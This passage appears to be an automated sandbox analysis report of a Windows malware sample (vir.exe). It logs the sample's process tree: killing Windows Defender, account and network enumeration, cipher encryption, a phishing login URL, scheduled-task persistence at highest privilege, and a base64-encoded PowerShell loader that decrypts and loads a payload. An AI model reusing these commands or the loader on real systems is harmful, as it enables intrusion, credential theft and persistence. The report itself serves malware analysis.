103 PID 1312 wrote to memory of 3660 1312 cmd.exe 103 PID 1312 wrote to memory of 3660 1312 cmd.exe 103 PID 4216 wrote to memory of 4088 4216 cmd.exe 104 PID 4216 wrote to memory of 4088 4216 cmd.exe 104 PID 4216 wrote to memory of 4088 4216 cmd.exe 104 PID 4088 wrote to memory of 4612 4088 net.exe 105 PID 4088 wrote to memory of 4612 4088 net.exe 105 PID 4088 wrote to memory of 4612 4088 net.exe 105 PID 4216 wrote to memory of 3428 4216 cmd.exe 106 PID 4216 wrote to memory of 3428 4216 cmd.exe 106 PID 4216 wrote to memory of 3428 4216 cmd.exe 106 PID 3428 wrote to memory of 1068 3428 net.exe 107 PID 3428 wrote to memory of 1068 3428 net.exe 107 PID 3428 wrote to memory of 1068 3428 net.exe 107 PID 2488 wrote to memory of 1736 2488 cmd.exe 108 PID 2488 wrote to memory of 1736 2488 cmd.exe 108 PID 2488 wrote to memory of 1736 2488 cmd.exe 108 PID 2488 wrote to memory of 3976 2488 cmd.exe 110 PID 2488 wrote to memory of 3976 2488 cmd.exe 110 PID 3976 wrote to memory of 908 3976 msedge.exe 111 PID 3976 wrote to memory of 908 3976 msedge.exe 111 PID 2488 wrote to memory of 4848 2488 cmd.exe 112 PID 2488 wrote to memory of 4848 2488 cmd.exe 112 PID 2488 wrote to memory of 4848 2488 cmd.exe 112 PID 2488 wrote to memory of 856 2488 cmd.exe 113 PID 2488 wrote to memory of 856 2488 cmd.exe 113 PID 2488 wrote to memory of 856 2488 cmd.exe 113 PID 2488 wrote to memory of 3008 2488 cmd.exe 115 PID 2488 wrote to memory of 3008 2488 cmd.exe 115 PID 3008 wrote to memory of 1792 3008 msedge.exe 117 PID 3008 wrote to memory of 1792 3008 msedge.exe 117 PID 3976 wrote to memory of 2040 3976 msedge.exe 120 PID 3976 wrote to memory of 2040 3976 msedge.exe 120 PID 3976 wrote to memory of 2040 3976 msedge.exe 120 PID 3976 wrote to memory of 2040 3976 msedge.exe 120 PID 3976 wrote to memory of 2040 3976 msedge.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\a826bb01-5af3-4898-831a-8b07bed3d518\ProgressBarSplash.exe"C:\Users\Admin\AppData\Local\Temp\a826bb01-5af3-4898-831a-8b07bed3d518\ProgressBarSplash.exe" -unpacking2⤵
- Executes dropped EXE
PID:1300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\!main.cmd" "2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
PID:1676
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
PID:3344
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- Enumerates system info in registry
PID:3660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- Gathers network information
PID:5056
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵PID:4612
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵PID:1068
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- Runs ping.exe
PID:2656
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ23⤵
- Manipulates Digital Signatures
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc196846f8,0x7ffc19684708,0x7ffc196847184⤵PID:908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:24⤵PID:2040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:4956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:84⤵PID:2956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:14⤵PID:5068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:14⤵PID:3224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:14⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:14⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:14⤵PID:5372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:14⤵PID:5248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:14⤵PID:2984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:84⤵PID:5252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:6496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:6852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵PID:4848
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:5968
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:6412
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:3288
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:6560
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\Rover.exeRover.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\web.htm3⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc196846f8,0x7ffc19684708,0x7ffc196847184⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,12456248177934986160,17587637902308256508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5860
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\Google.exeGoogle.exe3⤵
- Executes dropped EXE
PID:4480
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\helper.vbs"3⤵PID:6220
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- Runs ping.exe
PID:6240
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- Runs ping.exe
PID:4884
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:4624
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:6724
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- Checks computer location settings
- Modifies registry class
PID:6644 -
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3024
-
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5972 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 18085⤵
- Program crash
PID:6492
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵
- Blocklisted process makes network request
PID:5376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
PID:6460 -
C:\Users\Admin\AppData\Local\Temp\is-A88B5.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-A88B5.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$2037E,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6336 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵PID:6536
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6776
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵PID:4500
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6756
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\regmess.exeregmess.exe3⤵
- Executes dropped EXE
PID:2516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_50462145-13a0-4e03-b9ff-609c85837d16\regmess.bat" "4⤵PID:5788
-
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵PID:5792
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵PID:6676
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
PID:2248
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵PID:5708
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- Modifies Internet Explorer settings
PID:540
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵PID:3868
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
PID:4548
-
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:7036 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:5232
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6592 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:6160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\the.exethe.exe3⤵
- Executes dropped EXE
PID:6696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJ